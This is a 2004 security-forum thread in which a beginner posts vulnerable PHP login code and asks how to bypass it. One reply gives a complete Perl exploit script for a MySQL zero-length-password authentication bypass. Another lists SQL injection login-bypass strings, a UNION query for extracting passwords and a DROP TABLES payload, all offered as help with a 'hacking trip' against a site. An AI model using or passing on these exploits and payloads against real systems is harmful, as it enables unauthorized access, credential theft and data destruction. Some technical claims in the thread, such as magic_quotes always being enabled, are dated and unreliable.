Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 217 Members: 0 Total: 217 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> Newbies corner -> Bypass authentication View previous topic :: View next topic Bypass authentication Posted: Tue Jul 13, 2004 5:16 pm rafaelfpviana Beginner Joined: Jun 27, 2004 Posts: 1 how could I bypass this: Login form: Code: <p style='margin-left: 5; margin-right: 5'> <font face='Verdana' size='2'>You are not logged.<br> <br><form ACTION='index.php' method=post><input type="hidden" name="PHPSESSID" value="44c54761b5ff0ae5bb43bc8cbda6fd45" /> <input type='hidden' name='on' value='2'> <p align='center'><font face='Verdana' size='1'>:: Admin ::</font></p> <div align='center'> <center> <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='25%' id='AutoNumber1'> <tr> <td width='100%' colspan='2' bgcolor='#CCFFFF'> <p style='margin-top: 2; margin-bottom: 2' align='center'> <font size='1' face='Verdana'>Login</font></td> </tr> <tr> <td width='15%'> <p style='margin-left: 2; margin-top: 2; margin-bottom: 2'> <font size='1' face='Verdana'>Login:</font></td> <td width='50%'> <p style='margin-left: 2; margin-top: 2; margin-bottom: 2'><font color=''> <input type='text' name='id' size=10 style='font-family: ; font-size: 8 pt; background-color: #FFFFFF; border-style: solid; border-width: 1'></font></td> </tr> <tr> <td width='15%'> <p style='margin-left: 2; margin-top: 2; margin-bottom: 2'> <font size='1' face='Verdana'>Password:</font></td> <td width='50%'> <p style='margin-left: 2; margin-top: 2; margin-bottom: 2'><font color=''> <input type='password' name='passwd' size=20 style='font-family: ; font-size: 8 pt; background-color: #FFFFFF; border-style: solid; border-width: 1'></font></td> </tr> <tr> <td width='100%' colspan='2' bgcolor='#CCFFFF'> <p align='center' style='margin-top: 2; margin-bottom: 2'> <input type='submit' value=' Login ' name='Submit' style='border-style:solid; border-width:1px; font-family: ; font-size: 8 pt; '></td> </tr> </table> </center> </div> </form> This is the code that validates: Code: session_start(); include "../config.inc.php"; if ($id && $passwd) { $query = "select * from admin where id='$id' and passwd='$passwd'"; $result = mysql_query($query); if (mysql_num_rows($result) > 0 ) { $valid_admin = $id; session_register("valid_admin"); } } if (session_is_registered("valid_admin")) { include "admin.php"; } else { if (isset($id)) { echo "<p style='margin-left: 5; margin-right: 5'> <font face='Verdana' size='2' color='#ff0000'>login or password incorrect</font>"; } else { echo "<p style='margin-left: 5; margin-right: 5'> <font face='Verdana' size='2'>You are not logged.<br>"; } echo "$HERE IS THE FORM THAT I PUT ON THE TOP "; } Thanks for the help people. If you guys think that is something missing just tell me. _________________ No signature... Posted: Tue Jul 13, 2004 9:32 pm LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman war game ??? mysql bypass Code: #!/usr/bin/perl # # The script connects to MySQL and attempts to log in using a zero-length password # Based on the vuln found by NGSSecurity # # Exploit copyright (c) 2004 by Eli Kara, Beyond Security # <elik@beyondsecurity.com> # use strict; use IO::Socket::INET; usage() unless ((@ARGV >= 1) || (@ARGV <= 3)); my $username = shift(@ARGV); my $host = shift(@ARGV); if (!$host) { usage(); } my $port = shift(@ARGV); if (!$port) { $port = 3306; print "Using default MySQL port (3306)\n"; } # create the socket my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; # receive greeting my $reply; recv($socket, $reply, 1024, 0); if (length($reply) < 7) { print "Not allowed to connect to MySQL!\n"; exit(1); } print "Received greeting:\n"; HexDump($reply); print "\n"; # here we define the login OK reply # my $login_ok = "\x01\x00\x00\x02\xFE"; # break the username string into chars and rebuild it my $binuser = pack("C*", unpack("C*", $username)); # send login caps packet with password my $packet = "\x85\xa6". "\x03\x00\x00". "\x00". "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc.. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1) print "Sending caps packet:\n"; HexDump($packet); print "\n"; send $socket, $packet, 0; # receive reply recv($socket, $reply, 1024, 0); print "Received reply:\n"; HexDump($reply); my @list_bytes = unpack("C*", $reply); #print "The fifth byte is: ", $list_bytes[4], "\n"; if (length(@list_bytes) >= 4) { print "Response insufficent\n"; } #if ($reply eq $login_ok) if ($list_bytes[4] == 0 || $list_bytes[4] == 254) { print "Received OK reply, authentication successful!!\n"; } else { print "Authentication failed!\n"; } # close close($socket); sub usage { # print usage information print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n <username> - The DB username to authenticate as <host> - The host to connect to [port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n"; exit(1); } ### # do a hexdump of a string (assuming it's binary) ### sub HexDump { my $buffer = $_[0]; # unpack it into chars my @up = unpack("C*", $buffer); my $pos=0; # calculate matrix sizes my $rows = int(@up/16); my $leftover = int(@up%16); for( my $row=0; $row < $rows ; $row++, $pos+=16) { printf("%08X\t", $pos); my @values = @up[$pos .. $pos+15]; my @line; foreach my $val (@values) { push(@line, sprintf("%02X", $val)); } print join(' ', @line), "\n"; } # print last line printf("%08X\t", $pos); my @values = @up[$pos .. $pos+$leftover-1]; my @line; foreach my $val (@values) { push(@line, sprintf("%02X", $val)); } print join(' ', @line), "\n"; } Save to .pl (Perl script) hey there Posted: Fri Jul 16, 2004 8:19 am icenix Advanced user Joined: May 13, 2004 Posts: 106 Location: Australia hey there buddy, looks like we got a classic case of SQL Injection Code: $query = "select * from admin where id='$id' and passwd='$passwd'"; not sure who wrote this but he shouldnt of made it open source :/ I THINK that this can be exploited pretty easily. because $id and $passwd are completly unsanitized.. perfect evasion: you can use one of these two techniques to bypass: A: you can bypass the login by deeming it "TRUE" by putting as User ID: Code: ' or 0=0 -- ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a try some of them (someone correct me if im wrong, this should work or something similar) OR B: Extract the password from the database which would require you to have some knowledge of the database. try something like: Code: http://thesite.com/thelogin.php?id=' UNION ALL SELECT user_password FROM the_database WHERE "=' OR C ( hehehe ) : you can fuck the site to hell by dropping all the tables Code: http://thesite.com/thelogin.php?id=' ; DROP TABLES WHERE "=' im doing all this from memory and no doubt i might of missed something but yeah good luck on your little hacking trip any more questions just come back and ask _________________ =[WWW.WARAXE.US]= -Forum Rules Re: hey there Posted: Sun Jul 25, 2004 12:52 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu icenix wrote: hey there buddy, looks like we got a classic case of SQL Injection Code: $query = "select * from admin where id='$id' and passwd='$passwd'"; not sure who wrote this but he shouldnt of made it open source :/ I THINK that this can be exploited pretty easily. because $id and $passwd are completly unsanitized.. perfect evasion: you can use one of these two techniques to bypass: A: you can bypass the login by deeming it "TRUE" by putting as User ID: Code: ' or 0=0 -- ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a try some of them (someone correct me if im wrong, this should work or something similar) OR B: Extract the password from the database which would require you to have some knowledge of the database. try something like: Code: http://thesite.com/thelogin.php?id=' UNION ALL SELECT user_password FROM the_database WHERE "=' OR C ( hehehe ) : you can xxxx the site to hell by dropping all the tables Code: http://thesite.com/thelogin.php?id=' ; DROP TABLES WHERE "=' im doing all this from memory and no doubt i might of missed something but yeah good luck on your little hacking trip any more questions just come back and ask First of all, in case of php and mysql, there is "magic_quotes" enabled with ~100% probability. So no sql injection here And one more thing - mysql does not support multiple sql queries through php scripts, so forget about "... ; DROP TABLE ..." lol Posted: Mon Jul 26, 2004 10:11 pm icenix Advanced user Joined: May 13, 2004 Posts: 106 Location: Australia hahah well there you go told you i was unsure lol sorry but glad to see you got your answer. _________________ =[WWW.WARAXE.US]= -Forum Rules Re: hey there Posted: Mon Aug 23, 2004 7:44 am bima Regular user Joined: Jun 14, 2004 Posts: 16 Location: dunia fana Quote: And one more thing - mysql does not support multiple sql queries through php scripts, so forget about "... ; DROP TABLE ..." u right , maybe the next mysql version have this feature, so the multiple sql queries can be executed like mssql... Re: hey there Posted: Mon Aug 23, 2004 6:36 pm madman Active user Joined: May 24, 2004 Posts: 46 bima wrote: u right , maybe the next mysql version have this feature, so the multiple sql queries can be executed like mssql... Well, mysql indeed support multi queries separated with semicolon chars. But server-side parsers (like PHP) always stripping first match semicolon separator and all commands after. _________________ ch88rs, madman Bypass authentication www.waraxe.us Forum Index -> Newbies corner You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.096 Seconds